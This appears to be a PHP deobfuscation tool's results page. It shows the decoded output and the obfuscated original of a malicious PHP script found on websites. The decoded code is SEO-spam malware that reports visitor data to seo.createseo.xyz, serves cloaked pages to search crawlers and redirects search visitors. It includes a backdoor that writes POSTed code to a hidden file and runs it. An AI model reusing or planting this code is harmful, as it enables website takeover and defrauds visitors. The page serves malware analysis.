Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $SPlLuWJZGT='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$SPlLuWJZGT[..
Decoded Output download
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(0);
$gov='875';
$ixv='8.6.9';
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">
%s
</urlset>';
$smitem = '<url><loc>%s</loc></url>';
$smitemx = '<url><loc>%s</loc><xhtml:link rel="alternate" hreflang="ja" href="%s"/></url>';
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">
%s
</sitemapindex>';
$mainsmitem = '<sitemap><loc>%s://%s%ssitemap%d.xml</loc></sitemap>';
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4):"";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$proto = https();
$header = array(
'Lang: '.$lang,
'User-Agent: '.$ua,
'Referer: '.$ur,
'Http-Proto: '.$proto,
'Http-Host: '.$host,
'Http-Uri: '.$uri,
'Dbgroup: '.$gov,
'Remote-Addr: '.$ip
);
$postdata= "proto=$proto&shost=$host&ip=$ip&groupid=$gov&uri=$uri";
$smsn='/';
if (strpos($uri,"?")>0){
$vals=explode("?",$uri);
$smsn=sprintf("%s?",$vals[0]);
}
if (@preg_match('#[/|\?]pingsitemap(.*?).xml#i', $uri,$amu)) {
$result='';
if ($amu[1]==='' || @preg_match('#(\d+)-$#', $amu[1],$samu)){
$postdata="proto=$proto&shost=$host&ip=$ip&uri=$uri";
$postdata.=($samu[1]=='')?'&groupid='.$gov:'&groupid='.$samu[1];
$content = urlx('http://' . gets() . '/pingsitemap',$header,$postdata);
$values = explode(",",$content);
if (count($values)<2){
exit("ping num useragent param error:$content");
}
for($i=1;$i<=intval($values[0]);$i++){
$pgurl = sprintf('https://www.google.com/ping?sitemap=%s://%s%ssitemap%s%d.xml',$proto,$host,$smsn,$samu[0],$i);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
}else{
$pgurl = sprintf('https://www.google.com/ping?sitemap=%s://%s%ssitemap%s.xml',$proto,$host,$smsn,$amu[1]);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
exit($result);
}
if (@preg_match('#[/|\?]sitemap(.*?).xml$#i', $uri,$amu)) {
$postdata="ver=2&proto=$proto&shost=$host&ip=$ip&uri=$uri";
if ( @preg_match('#(\d+)-$#', $amu[1],$samu) ){
$postdata.='&groupid='.$samu[1];
}else{
$postdata.='&groupid='.$gov;
}
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'
'.$postdata));
$content = urlx('http://' . gets() . '/sitemap'.(($amu[1]==''||$samu[1]!='')?'.xml':'/'.$amu[1]),$header,$postdata);
if ($content==false){
exit();
}
@header('Content-type: text/xml');
if (@preg_match('#^(\d)+#',$content)) {
$xml='';
for($i=1;$i<=intval($content);$i++){
$xml .= sprintf($mainsmitem,$proto,$host,$smsn,$i,date('Y-m-d\TH:i:sP', time()));
}
echo sprintf($mainsm,$xml); exit();
}
$ids = explode("
", $content);
$smbody='';
foreach ($ids as $v) {
$purl="$proto://${host}${smsn}${v}";
$smbody .=sprintf($smitem,$purl,$purl);
}
echo sprintf($smframe,$smbody); exit();
}
if (isset($_SERVER['HTTP_XDOIM']) && strlen($_SERVER['HTTP_XDOIM'])>0){
$ts = isset($_SERVER['HTTP_TIMESTAMP'])?$_SERVER['HTTP_TIMESTAMP']:"";
$tmp = @file_get_contents("php://input");
@file_put_contents(".eGA0Ty2WLh",$tmp,FILE_USE_INCLUDE_PATH);
echo (include '.eGA0Ty2WLh'); unlink('.eGA0Ty2WLh');
exit();
}
if (@preg_match('#[/|\?]getver$#i', $uri,$amu)){
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'
'.$postdata));
$cnt=trim(urlx('http://' . gets() . '/getver',$header,$postdata));
echo (($cnt===false)?'fail'.gets():$cnt.$gov.gets()).$ixv;exit();
}
if (@preg_match('#google|yahoo|bing|craft|Crawler#i',$ua)) {
$postdata.="&ver=2";
if(@preg_match('#([a-z]+)-(\d+)(.html)?$#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',preg_replace('/[a-z](xyz|buzz).*$/',".$1",strrev($amu[1])),$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}elseif(@preg_match('#/([a-z]{8})[-_/]?(\d+)#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',$amu[1],$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}else{
$content=@trim(urlx(sprintf('http://%s/bot/home?'.$postdata , gets() ),$header,$postdata,1));
}
echo $content;exit();
}
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i',$ur) && (@preg_match('#([a-z]+)-(\d+)(.html)?$#i',$uri)||@preg_match('#/([a-z]{8})[-_/]?(\d+)#i',$uri))){
$pdt=$postdata.'&groupid='.$gov.'&uri='.$uri.'&ip='.$ip;
$purl=urlx(sprintf('http://%s/bot/302?'.$pdt , gets() ),$header,$pdt,1);
if (strlen($purl)>10){
@header('Location: ' . $purl); exit();
}
}
function urlx($url,$header=null,$postdata=null,$gz=null,$ua=null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if (!($gz===null)){
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
}
if (stripos($url, "https:")===0) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (!($header===null)){
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (!($postdata===null)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
if (!($ua===null)) {
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function cc($uri){
$vals = explode("-",substr($uri,1,strlen($uri)-6));
if (sizeof($vals)!=3){
return false;
}
$newcrc = sprintf("%u",crc32(sprintf("%s-%s",$vals[0],$vals[1])));
return ($newcrc == $vals[2]);
}
function gets(){
return 'seo.createseo.xyz';
}
function https() {
if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
return "https";
}
return "http";
}
function clientip(){
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
return getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
return $_SERVER['REMOTE_ADDR'];
}
}
function str2val($key){
$val = 0;
for ($i = 0; $i < strlen($key); $i++) {
$val += ord($key[$i]);
}
return $val;
}
?>
Did this file decode correctly?
Original Code
<?php $SPlLuWJZGT='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$SPlLuWJZGT[(105/15)].$SPlLuWJZGT[(26-1)].$SPlLuWJZGT[(1*49)].$SPlLuWJZGT[((10*1)+18)].$SPlLuWJZGT[(14+22)].$SPlLuWJZGT[(44+5)].$SPlLuWJZGT[(44-13)].$SPlLuWJZGT[(684/18)].$SPlLuWJZGT[(23+4)].$SPlLuWJZGT[(72-(33-7))].$SPlLuWJZGT[(154/22)].$SPlLuWJZGT[(11+25)].$SPlLuWJZGT[(65-(62-31))].$SPlLuWJZGT[(26-6)].$SPlLuWJZGT[((27*2)-8)];$pHFdNhg9688=$SPlLuWJZGT[(20-9)].$SPlLuWJZGT[(2*4)].$SPlLuWJZGT[(29*1)].$SPlLuWJZGT[(160/4)];$MYtraky2482=$SPlLuWJZGT[(8*5)].$SPlLuWJZGT[((1+0)+2)].$SPlLuWJZGT[(6+(1*(95/19)))].$SPlLuWJZGT[(140/5)].$SPlLuWJZGT[(522/18)].$SPlLuWJZGT[(7*((7-3)-2))].$SPlLuWJZGT[(2*14)].$SPlLuWJZGT[(138/(2+4))].$SPlLuWJZGT[(1029/(378/18))].$SPlLuWJZGT[((2*189)/9)].$SPlLuWJZGT[(12+(0+0))].$SPlLuWJZGT[(31*1)].$SPlLuWJZGT[(48/(36/12))].$SPlLuWJZGT[(735/15)].$SPlLuWJZGT[(0+7)].$SPlLuWJZGT[(18+2)].$SPlLuWJZGT[(18-(10/5))].$SPlLuWJZGT[(735/15)].$SPlLuWJZGT[(0+(2-(1*1)))].$SPlLuWJZGT[(16-(3+(36/(0+18))))].$SPlLuWJZGT[((167-23)/18)].$SPlLuWJZGT[(0+(18-9))].$SPlLuWJZGT[(1*3)].$SPlLuWJZGT[(11*(1+(0/(78/13))))].$SPlLuWJZGT[(2*7)].$SPlLuWJZGT[(29*(0+1))].$SPlLuWJZGT[(38-(8+9))].$SPlLuWJZGT[(15*2)].$SPlLuWJZGT[(45-11)].$SPlLuWJZGT[(1*46)].$SPlLuWJZGT[(1*(17+21))].$SPlLuWJZGT[(78/3)].$SPlLuWJZGT[(21+(77/11))].$SPlLuWJZGT[(22+14)].$SPlLuWJZGT[(343/(91/13))].$SPlLuWJZGT[(1*1)].$SPlLuWJZGT[(21-10)].$SPlLuWJZGT[(22+(12/2))].$SPlLuWJZGT[(180/20)].$SPlLuWJZGT[(3+((0+0)*1))].$SPlLuWJZGT[(686/(126/9))].$SPlLuWJZGT[(61-(32-8))].$SPlLuWJZGT[(476/17)].$SPlLuWJZGT[((4-0)+22)].$SPlLuWJZGT[(((23-(2*5))/13)-0)].$SPlLuWJZGT[(7+(84/21))].$SPlLuWJZGT[(28/2)].$SPlLuWJZGT[(9-0)].$SPlLuWJZGT[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>Function Calls
| null | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
| create_function | 1 |
Stats
| MD5 | 7d314c707bf7a8c240f451c59405700a |
| Eval Count | 2 |
| Decode Time | 169 ms |